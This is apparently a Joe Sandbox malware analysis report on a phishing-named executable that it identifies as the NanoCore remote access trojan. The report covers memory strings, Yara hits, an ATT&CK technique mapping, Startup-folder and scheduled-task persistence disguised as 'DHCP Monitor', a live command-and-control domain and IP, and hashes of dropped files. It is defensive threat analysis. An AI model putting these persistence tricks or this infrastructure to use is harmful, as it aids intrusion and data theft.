Source: RegAsm.exe, 00000001.00000002.500221210.0000000003286000.00000004.00000001.sdmp	Binary or memory string: Program Manager
Source: Quotation ATB-PR28500KINH.exe, 00000000.00000002.498018854.0000000001220000.00000002.00000001.sdmp, RegAsm.exe, 00000001.00000002.498274600.0000000001940000.00000002.00000001.sdmp, Quotation ATB-PR28500KINH.exe, 00000002.00000002.498789127.0000000001B00000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: Quotation ATB-PR28500KINH.exe, 00000000.00000002.498018854.0000000001220000.00000002.00000001.sdmp, RegAsm.exe, 00000001.00000002.498274600.0000000001940000.00000002.00000001.sdmp, Quotation ATB-PR28500KINH.exe, 00000002.00000002.498789127.0000000001B00000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: RegAsm.exe, 00000001.00000002.500221210.0000000003286000.00000004.00000001.sdmp	Binary or memory string: Program Manager8LI
Source: Quotation ATB-PR28500KINH.exe, 00000000.00000002.498018854.0000000001220000.00000002.00000001.sdmp, RegAsm.exe, 00000001.00000002.498274600.0000000001940000.00000002.00000001.sdmp, Quotation ATB-PR28500KINH.exe, 00000002.00000002.498789127.0000000001B00000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Queries volume information: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Queries volume information: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 0000000F.00000002.304004800.0000000002D41000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.503999050.00000000040E9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.497351250.0000000000B1E000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.497878671.0000000001474000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.303385478.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.505763687.0000000005342000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.504002256.0000000004101000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.304067682.0000000003D49000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.515094519.0000000005B42000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.495967274.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.507063640.0000000006670000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.503615613.00000000038A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7160, type: MEMORY
Source: Yara match	File source: Process Memory Space: Quotation ATB-PR28500KINH.exe PID: 7036, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3392, type: MEMORY
Source: Yara match	File source: Process Memory Space: Quotation ATB-PR28500KINH.exe PID: 6248, type: MEMORY
Source: Yara match	File source: 1.2.RegAsm.exe.6670000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Quotation ATB-PR28500KINH.exe.5340000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RegAsm.exe.6670000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Quotation ATB-PR28500KINH.exe.5b40000.1.unpack, type: UNPACKEDPE

Remote Access Functionality:

Detected Nanocore Rat

Show sources

Source: Quotation ATB-PR28500KINH.exe, 00000000.00000002.505763687.0000000005342000.00000040.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegAsm.exe, 00000001.00000002.499194706.00000000030FB000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegAsm.exe, 00000001.00000002.499194706.00000000030FB000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: Quotation ATB-PR28500KINH.exe, 00000002.00000002.504002256.0000000004101000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegAsm.exe, 0000000F.00000002.304004800.0000000002D41000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegAsm.exe, 0000000F.00000002.304004800.0000000002D41000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 0000000F.00000002.304004800.0000000002D41000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.503999050.00000000040E9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.497351250.0000000000B1E000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.497878671.0000000001474000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.303385478.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.505763687.0000000005342000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.504002256.0000000004101000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.304067682.0000000003D49000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.515094519.0000000005B42000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.495967274.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.507063640.0000000006670000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.503615613.00000000038A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7160, type: MEMORY
Source: Yara match	File source: Process Memory Space: Quotation ATB-PR28500KINH.exe PID: 7036, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3392, type: MEMORY
Source: Yara match	File source: Process Memory Space: Quotation ATB-PR28500KINH.exe PID: 6248, type: MEMORY
Source: Yara match	File source: 1.2.RegAsm.exe.6670000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Quotation ATB-PR28500KINH.exe.5340000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RegAsm.exe.6670000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Quotation ATB-PR28500KINH.exe.5b40000.1.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scheduled Task/Job1	Startup Items1	Startup Items1	Masquerading11	Input Capture11	Security Software Discovery111	Remote Services	Input Capture11	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Scheduled Task/Job1	Process Injection212	Virtualization/Sandbox Evasion3	LSASS Memory	Virtualization/Sandbox Evasion3	Remote Desktop Protocol	Archive Collected Data11	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Registry Run Keys / Startup Folder12	Scheduled Task/Job1	Disable or Modify Tools1	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Remote Access Software1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	DLL Side-Loading1	Registry Run Keys / Startup Folder12	Process Injection212	NTDS	Application Window Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	DLL Side-Loading1	Deobfuscate/Decode Files or Information1	LSA Secrets	File and Directory Discovery1	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol1	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Hidden Files and Directories1	Cached Domain Credentials	System Information Discovery12	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Obfuscated Files or Information1	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Software Packing13	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	DLL Side-Loading1	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Quotation ATB-PR28500KINH.exe	27%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla
Quotation ATB-PR28500KINH.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HJdyTuap.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\7redfg	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\7redfg	27%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla

Unpacked PE Files

Source	Detection	Scanner	Label	Download
15.2.RegAsm.exe.400000.0.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
0.2.Quotation ATB-PR28500KINH.exe.5340000.1.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
1.2.RegAsm.exe.400000.0.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
2.2.Quotation ATB-PR28500KINH.exe.5b40000.1.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
kengeorge.zapto.org	185.140.53.139	true	true		unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.140.53.139	unknown	Sweden		209623	DAVID_CRAIGGG	true

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	321029
Start date:	20.11.2020
Start time:	09:25:51
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 0s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Quotation ATB-PR28500KINH.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	27
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.adwa.evad.winEXE@12/8@23/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 0.4% (good quality ratio 0.4%) Quality average: 70.5% Quality standard deviation: 17.4%
HCA Information:	Successful, ratio: 100% Number of executed functions: 65 Number of non-executed functions: 3
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information. Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 13.64.90.137, 13.88.21.125, 92.122.144.200, 51.104.139.180, 8.248.113.254, 8.253.95.249, 8.241.122.254, 8.248.115.254, 8.248.121.254, 40.67.254.36, 52.155.217.156, 20.54.26.129, 95.101.22.134, 95.101.22.125, 51.11.168.160 Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wns.notify.windows.com.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, par02p.wns.notify.windows.com.akadns.net, db5p.wns.notify.windows.com.akadns.net, emea1.notify.windows.com.akadns.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, client.wns.windows.com, fs.microsoft.com, db3p-ris-pf-prod-atm.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, ris.api.iris.microsoft.com, umwatsonrouting.trafficmanager.net, skypedataprdcolwus15.cloudapp.net Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
09:26:49	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HJdyTuap.exe
09:26:55	API Interceptor	963x Sleep call for process: RegAsm.exe modified
09:26:56	Task Scheduler	Run new task: DHCP Monitor path: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" s>$(Arg0)

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
185.140.53.139	Quotation ATB-PR28500KINH.exe	Get hash	malicious	Browse
	RFQ-BOHB-SS-FD6L4.exe	Get hash	malicious	Browse
	PURCHASE_FABRICS_APPAREL_100%_COOTON.exe	Get hash	malicious	Browse
	GT-082568-HSO-280820.DOCX.exe	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
DAVID_CRAIGGG	Quotation ATB-PR28500KINH.exe	Get hash	malicious	Browse	185.140.53.139
	Ups file de.exe	Get hash	malicious	Browse	185.140.53.221
	NyUnwsFSCa.exe	Get hash	malicious	Browse	185.140.53.149
	purchase order.exe	Get hash	malicious	Browse	185.140.53.233
	Remittance Details.xls	Get hash	malicious	Browse	185.140.53.184
	PaymentConfirmation.exe	Get hash	malicious	Browse	185.140.53.183
	ORDER #02676.doc.exe	Get hash	malicious	Browse	185.244.30.92
	b11305c6ab207f830062f80eeec728c4.exe	Get hash	malicious	Browse	185.140.53.233
	ShippingDoc.jar	Get hash	malicious	Browse	185.244.30.139
	1kn1ejwPxi.exe	Get hash	malicious	Browse	185.140.53.132
	D6vy84I7rJ.exe	Get hash	malicious	Browse	185.140.53.149
	7iatifHQEp.exe	Get hash	malicious	Browse	185.140.53.132
	Sbext4ZNBq.exe	Get hash	malicious	Browse	185.140.53.197
	xEdiPz1bC3.exe	Get hash	malicious	Browse	185.140.53.234
	7D1wvBrRib.exe	Get hash	malicious	Browse	185.140.53.234
	O8LDCTOK07.exe	Get hash	malicious	Browse	185.140.53.233
	aE78QTkV5H.exe	Get hash	malicious	Browse	185.244.30.98
	DHL Shipment Notice of Arrival AWB 8032697940773.js	Get hash	malicious	Browse	185.165.153.158
	ORDER-#00654.doc.....exe	Get hash	malicious	Browse	185.165.153.116
	SMJshb9rCD.exe	Get hash	malicious	Browse	185.140.53.154

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	42
Entropy (8bit):	4.0050635535766075
Encrypted:	false
SSDEEP:	3:QHXMKa/xwwUy:Q3La/xwQ
MD5:	84CFDB4B995B1DBF543B26B86C863ADC
SHA1:	D2F47764908BF30036CF8248B9FF5541E2711FA2
SHA-256:	D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
SHA-512:	485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..

C:\Users\user\AppData\Local\Temp\tmpAC5D.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1319
Entropy (8bit):	5.134254141338449
Encrypted:	false
SSDEEP:	24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0mxz5xtn:cbk4oL600QydbQxIYODOLedq3Zxz5j
MD5:	48EF7FA9033389AD7929D7A6B9D10298
SHA1:	9DB6CB7325C8BDF66A15F7B5F34703709A45AEB6
SHA-256:	0C1B5F67EEB276D1D4205B138CE32BC6149924E02281A2DB8E4623A700E88F15
SHA-512:	AC8BD104ECBACC9BCCCE9E087F67E5B18072D59367CCD31D4E66132B6BAAEA520CBA5B9B59464483D86ABF74826B382C402F12E9A586C99BDA8C78A0DE33944E
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak

C:\Users\user\AppData\Roaming\7redfg Download File
Process:	C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1020416
Entropy (8bit):	6.746514435463881
Encrypted:	false
SSDEEP:	24576:MbHvzJzELhKXqKNxNTmV3s03o1+pUfOA:MzzJYLhKlpmV3s6o1UUfP
MD5:	DDB5D5410477CD3855A1F542112808C0
SHA1:	5FC06EC885CAFA6E8F955651B9E2115B705B2B4D
SHA-256:	9F76F4B990CE938D48B11501AD00D99795B172B44B1F94EA7CA3A26CEB64C1D5
SHA-512:	E9C60CC1C03D40C7C45C53FC5A78F1E8B801572A0FDDE422FBF8F80BCC8EEE89C023C48398A15D388275CF6589F6BAAB42E511933ACAD3B3C94CBE4B3D1F819B
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 27%
Reputation:	low
